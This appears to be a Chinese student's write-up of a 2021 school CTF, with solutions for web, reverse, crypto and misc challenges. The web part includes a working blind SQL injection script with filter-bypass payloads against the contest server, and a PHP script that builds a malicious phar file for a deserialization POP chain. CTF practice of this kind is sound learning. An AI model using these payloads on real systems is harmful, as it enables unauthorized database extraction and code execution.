2021秋季赛部分wp

前言

震惊!平平无奇的web手,竟然把crypto ak了,顺带做了2个re和几个misc。。。

校赛感觉难度一般,就是给入门的做了,暑假学的好多都用上了,感觉不错。不过持续时间太长了,直接7天,而且国庆那几天贼忙,部门、工作室、新生······时间不是很合理,最后几天直接摆烂了,一个题也没做。

Web

web4

无列名注入,和寒假赛的类似

库名还是cumtctf

爆表名得到flag_table_1

无列名注入得到flag,需要变成小写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
import requests
import time

table = ''

url = 'http://81.69.241.44:25500/index.php'

headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0'
}
s = "-{abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,_!@#$%^&*()}"
"""
for i in range(1,1000):
for j in s:
time.sleep(0.1)
payload = "1'/**/||/**/!(ascii(mid((select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/!(database_name<>'cumtctf')),{},1))<>ascii('{}'))#".format(i, j)
data = {
'username': payload,
'password': '1'
}
res = requests.post(url=url, headers=headers, data=data).text
if res.find('good') != -1:
table += j
print(table)
break

"""

"""
payload2 = "1'/**/||/**/!(mid((select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/!(database_name<>'cumtctf')),1,34)<>'address,email,flag_table_1,users')#;"
data = {
'username': payload2,
'password': '1'
}
res = requests.post(url=url, headers=headers, data=data).text
"""

"""
payload3 = "1'/**/||/**/(1,1)>(select/**/*/**/from/**/flag_table_1/**/limit/**/0,1)#;"
data = {
'username': payload3,
'password': '1'
}
res = requests.post(url=url, headers=headers, data=data).text
print(res)
"""

def trans(flag):
res = ''
for i in flag:
res += hex(ord(i))
res = '0x' + res.replace('0x','')
return res
flag = ''
for i in range(1,500):
time.sleep(0.01)
hexchar = ''
for char in range(32, 126):
# for j in s:
hexchar = trans(flag+ chr(char))
payload = "0'||/**/if((select/**/(0,{})>(select/**/*/**/from/**/flag_table_1/**/limit/**/0,1)),1,0)#".format(hexchar)
data = {
'username': payload,
'password': ''
}
r = requests.post(url=url, data=data).text
if r.find('good') != -1:
flag += chr(char-1)
# flag += j
print(flag)
break

web5

phar反序列化

先通过任意文件读取获得class file fun class这些php文件,代码审计

构造pop链,生成phar文件

看到已经有其他队伍把这题做出来了,此时先测试看看能不能连上别的队伍上传成功的文件,根据file.php中对文件名的处理,随便测试了几个,发现phar.jpg处理后的文件路径能用,获得flag

下面贴上自己写的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php

class File{
public $fakefile;
public $file;
}

class Docker{
public $str;
public $container1;
public $container2;
}
class Cloud{
private $value;
public $docker;
public function __construct()
{
$this->value = "/var/www/html/flag.php";
}
}
$File = new File();
$docker = new Docker();
$cloud = new Cloud();

$cloud->docker = 'O\:6\:\"Docker\"\:3\:\{s\:3\:\"str\"\;s\:4\:\"haha\"\;s\:10\:\"container1\"\;s\:4\:\"haha\"\;s\:10\:\"container2\"\;s\:4\:\"haha\"\;\}';
$File->file = $docker;
$docker->str = $cloud;


$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($File);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>

Re

签到

直接拖到ida里,得到flag

net

拖到ILSpy里,获得逆向代码

简单写个脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
def ppp(a, b, c):
num = 1
a %= c
while b != 0:
if b % 2 == 1:
num = num * a % c
b >>= 1
a = a * a % c
return num

array2 = [
30361,
550,
595,
15412,
30361,
15412,
8346,
27071,
37594,
37534,
9781,
1082,
19619,
9781,
1082,
15513,
29591,
19596,
30078,
27942,
25366,
29107,
7433,
28493,
9781,
29591,
2664,
12540
]

test = []
for j in range(len(array2)):
for i in range(0, 100000):
if array2[j] == ppp(i, 377, 38009):
test.append(i)
break

for i in range(0,100):
for j in test:
print(chr(j-i), end='')
print('\n')

跑出flag

Crypto

签到

简单写个脚本爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
flag = ''
table='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
a = 37
b = 23
c = 52
"""
def affine(m,a,b,c):
chipher=''
for i in range(len(m)):
if m[i] in table:
chipher+=table[(a*(table.find(m[i]))+b)%c]
else:
chipher+=m[i]
return chipher
"""

t = 'aoxL{Fw0_TXk_y3xtW_ZP_TCBg7VLCxGwb}'

for i in range(len(t)):
if t[i] in table:
for j in table:
if table[(a*(table.find(j))+b)%c] == t[i]:
flag += j
print(flag)
else:
flag += t[i]
print(flag)



lcg

从网上找个个脚本,写的很详细

https://blog.csdn.net/superprintf/article/details/108964563

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
from Crypto.Util.number import *
"""
flag = ''.encode()

seed = bytes_to_long(flag)

print(seed)

length = seed.bit_length()

print(length)

n=getPrime(length)
a=getPrime(length)
b=getPrime(length)
s=[]


for i in range(10):
seed = (a*seed+b)%n
s.append(seed)

print(s)
"""

from Crypto.Util.number import *
def gcd(a,b):
if(b==0):
return a
else:
return gcd(b,a%b)
s=[64053834035066785058511795263859088093402576718387054930069870694827422995248363210875296865931156540418540088656840163752864867889701529, 62747878069691338351001678737533032651009187924993079609551517187402239263500990458468121965725468864035542647616568888614971291913860683, 8610389166165547798963079074461089122942923569827711232062490735297527674581120584017030806864406444034839689358368567214353599295961192, 67368398051089407366868405625671942347378755129423872678285919732014302509367453094142041707571135936337763803644340301362544880144675515, 3140546334522640626644397935274312967014650101920766829848908314358452633165879115222769049730993718556007257838431843662986174886332684, 86570894867827558107244361752089586436766881136739525172025909326268148819720261812567282066327259810017581923500053674785415315313293458, 74270633946662538117925791534180331044438757906314082041974053142483165604719102121031974214138125154407150853174565679126633465007917723, 82222345180880564316408536364709779418528442531150999715627704885024880160675971236916036110841803202987616501846568355385621016171784903, 79833541796675422937999973936505826001046326324194169378072775519666431460490483847928549009565561011528302879850550395115321828798479473, 70276250399219459795079058514491950109021040664671993784167534811426903455184545174600178849521746939676479421177456528336980088529680364]
t = []
for i in range(9):
t.append(s[i]-s[i-1])
all_n = []
for i in range(7):
all_n.append(gcd((t[i+1]*t[i-1]-t[i]*t[i]), (t[i+2]*t[i]-t[i+1]*t[i+1])))

MMI = lambda A, n,s=1,t=0,N=0: (n < 2 and t%N or MMI(n, A%n, t, s-A//n*t, N or n),-1)[n<1] #逆元计算
for n in all_n:
n=abs(n)
if n==1:
continue
a=(s[2]-s[1])*MMI((s[1]-s[0]),n)%n
ani=MMI(a,n)
b=(s[1]-a*s[0])%n
seed = (ani*(s[0]-b))%n
plaintext=seed
print(long_to_bytes(plaintext))

Dear Alice

google ctf 2021原题

https://github.com/Haorical/Wargames/tree/master/google-2021/h1

嫖到脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
import os
import hashlib
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes


INF = (1, 1, 0)

d = 311315114987715623444276142623839583360207853110657101019745009424926710590583360123029204556690633449715530612380512577293882572730509350735778781050933

mod = 8948962207650232551656602815159153422162609644098354511344597187200057010413552439917934304191956942765446530386427345937963894309923928536070534607816947
a = 6294860557973063227666421306476379324074715770622746227136910445450301914281276098027990968407983962691151853678563877834221834027439718238065725844264138
b = 3245789008328967059274849584342077916531909009637501918328323668736179176583263496463525128488282611559800773506973771797764811498834995234341530862286627
n = 8948962207650232551656602815159153422162609644098354511344597187200057010413418528378981730643524959857451398370029280583094215613882043973354392115544169
G = (5139617820728399941653175323358137352238277428061991823713659546881441331696699723004749024403291797641521696406798421624364096550661311227399430098134141,
1798860115416690485862271986832828064808333512613833729548071279524320966991708554765227095605106785724406691559310536469721469398449016850588110200884962,
5042518522433577951395875294780962682755843408950010956510838422057522452845550974098236475624683438351211176927595173916071040272153903968536756498306512)

def Double(p):
x, y, z = p
if z == 0 or y == 0:
return INF
ysqr = y * y % mod
zsqr = z * z % mod
s = 4 * x * ysqr % mod
m = (3 * x * x + a * zsqr * zsqr) % mod
x2 = (m * m - 2 * s) % mod
y2 = (m * (s - x2) - 8 * ysqr * ysqr) % mod
z2 = 2 * y * z % mod
return x2, y2, z2

def Add(p, q):
if p[2] == 0:
return q
if q[2] == 0:
return p
x1, y1, z1 = p
x2, y2, z2 = q
z1sqr = z1 * z1 % mod
z2sqr = z2 * z2 % mod
u1 = x1 * z2sqr % mod
u2 = x2 * z1sqr % mod
s1 = y1 * z2 * z2sqr % mod
s2 = y2 * z1 * z1sqr % mod
if u1 == u2:
if s1 != s2:
return INF
else:
return Double(p)
h = u2 - u1 % mod
hsqr = h * h % mod
hcube = hsqr * h % mod
r = s2 - s1 % mod
t = u1 * hsqr % mod
x3 = (r * r - hcube - 2 * t) % mod
y3 = (r * (t - x3) - s1 * hcube) % mod
z3 = h * z1 * z2 % mod
return x3, y3, z3

def Multiply(p, x):
if p == INF:
return p
res = INF
while x:
x, r = divmod(x, 2)
if r:
res = Add(res, p)
p = Double(p)
return res

def Transform(m, l):
z = m
shift = l - n.bit_length()
if shift > 0:
z >>= shift
return z

def RNG(nbits, a, b):
nbytes = nbits // 8
B = os.urandom(nbytes)
return a * sum([B[i] * b ** i for i in range(len(B))]) % 2**nbits

def Sign(msg, d):
h = hashlib.sha512(msg)
z = Transform(int.from_bytes(h.digest(), 'big'), h.digest_size*8)
print('d = ', d)
print('z = ', z)
k = RNG(n.bit_length(), 16843009, 4294967296)
print('k = ', k)
x1, y1, z1 = Multiply(G, k)
r = (x1 * pow(z1, -2, mod) % mod) % n
s = pow(k, -1, n) * (z + r * d) % n
print('r = ', r)
print('s = ', s)
print('left = ', pow(k, -1, n) % n)
print('right = ', (z + r * d) % n)
assert int(s) == pow(k, -1, n) * (z + r * d) % n
return r, s

def Verify(msg, Q, r, s):
h = hashlib.sha512(msg)
z = Transform(int.from_bytes(h.digest(), 'big'), h.digest_size*8)
u1 = z*pow(s, -1, n) % n
u2 = r*pow(s, -1, n) % n
x1, y1, z1 = Add(Multiply(G, u1), Multiply(Q, u2))
return r == (x1 * pow(z1, -2, mod) % mod) % n

def Encrypt(plaintext, x):
key = hashlib.sha256(str(x).encode()).digest()
aes = algorithms.AES(key)
encryptor = Cipher(aes, modes.ECB(), default_backend()).encryptor()
padder = padding.PKCS7(aes.block_size).padder()
padded_data = padder.update(plaintext) + padder.finalize()
ciphertext = encryptor.update(padded_data) + encryptor.finalize()
return ciphertext

def Decrypt(ciphertext, x):
key = hashlib.sha256(str(x).encode()).digest()
aes = algorithms.AES(key)
decryptor = Cipher(aes, modes.ECB(), default_backend()).decryptor()
unpadder = padding.PKCS7(aes.block_size).unpadder()
decrypted_data = decryptor.update(ciphertext) + decryptor.finalize()
plaintext = unpadder.update(decrypted_data) + unpadder.finalize()
return plaintext

_, _, ca = (8832295267397231051293216564016639537146222596144354850230682204978731311879255662259663270183445827348338041752369314181111940713714991119349376636404112, 8683784208731634307361157916911868656279723101808163939313971801256736484458199874570532609285522391139002296248059424750941962344918156540408403221858292, 105398535464409171419472607677747462033030589690350997911381059472020486557672504778060748058626707326992258591478040500759349352824508941100030623708235493999018571171774658661651532338275358740821547158517615704187173346885098836066743736788259192831313414309775979590033581301910426314601982482556670097620)

ka = [
0x8a6e81a10c229af504772b51c502638820811034faa62b8dafa019210347918419b71d0638c89b59026b7611edc6a14b2c1c1fb1092a352adfffb7e114f4f385,
0x3f837315a1fb46097f5eb680697901d75758b859846d37cad33d3f464efb84ace1e85fc60f4e445a031b5ca0e4965e0b081bd4a6e8efea1d3ba07aad51a70cd
]
ca = ca.to_bytes(byteorder='big',length=(ca.bit_length() + 7) // 8)

for k in ka:
try:
recv_msg = Decrypt(ca, k)
print(recv_msg)
except:
pass

ElGamal

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import gmpy2
data = open('./output.txt').read().split('\n')
g, h, A, B, p, q = eval(data[0])

c1, c2 = eval(data[1])
c1_, c2_ = eval(data[2])

tmp = gmpy2.powmod(c2, A, p) * gmpy2.powmod(h, B, p) * gmpy2.invert(c2_, p)
tmp = tmp % p

print 't=', tmp
print 'A=', A
print 'p=', p
gg, x, y = gmpy2.gcdext(A - 1, p - 1)
print gg

m = gmpy2.powmod(tmp, x, p)
print hex(m)[2:].decode('hex')

Misc

签到

base32解码

LSB

zsteg直接出

加密

百度识图,福尔摩斯,搜索发现跳舞的小人

发现提示信息http://330k.github.io/misc_tools/unicode_steganography.html

密码文件虽然空白但是占用空间很大,用上面的工具

最后16进制转字符串得到flag

社工

扫描机票上的条形码即可,属于pdf417,m1后面就是姓名

https://online-barcode-reader.inliteresearch.com/